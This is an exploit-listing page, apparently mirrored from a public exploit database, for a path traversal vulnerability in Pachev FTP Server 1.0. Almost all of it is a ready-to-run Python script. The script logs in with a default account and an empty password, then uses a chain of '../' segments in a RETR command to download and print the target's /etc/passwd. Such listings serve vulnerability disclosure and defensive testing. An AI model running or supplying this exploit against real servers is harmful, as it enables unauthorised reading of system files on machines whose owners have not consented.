pachev ftp server 1.0 path traversal
▸▸▸ Exploit & Vulnerability >> remote exploit & linux vulnerability
# Exploit Title: Pachev FTP Server 1.0 - Path Traversal # Date: 2020-01-23 # Vulnerability: Path Traversal # Exploit Author: 1F98D # Vendor Homepage: https://github.com/pachev/pachev_ftp from ftplib import FTP ip = raw_input("Target IP: ") port = int(raw_input("Target Port: ")) ftp = FTP() ftp.connect(host=ip, port=port) ftp.login('pachev', '') ftp.retrbinary('RETR ../../../../../../../../etc/passwd', open('passwd.txt', 'wb').write) ftp.close() file = open('passwd.txt', 'r') print "[**] Printing the contents of /etc/passwd\n" print file.read()
Pachev ftp server 1.0 path traversal Vulnerability / Exploit Source : Pachev ftp server 1.0 path traversal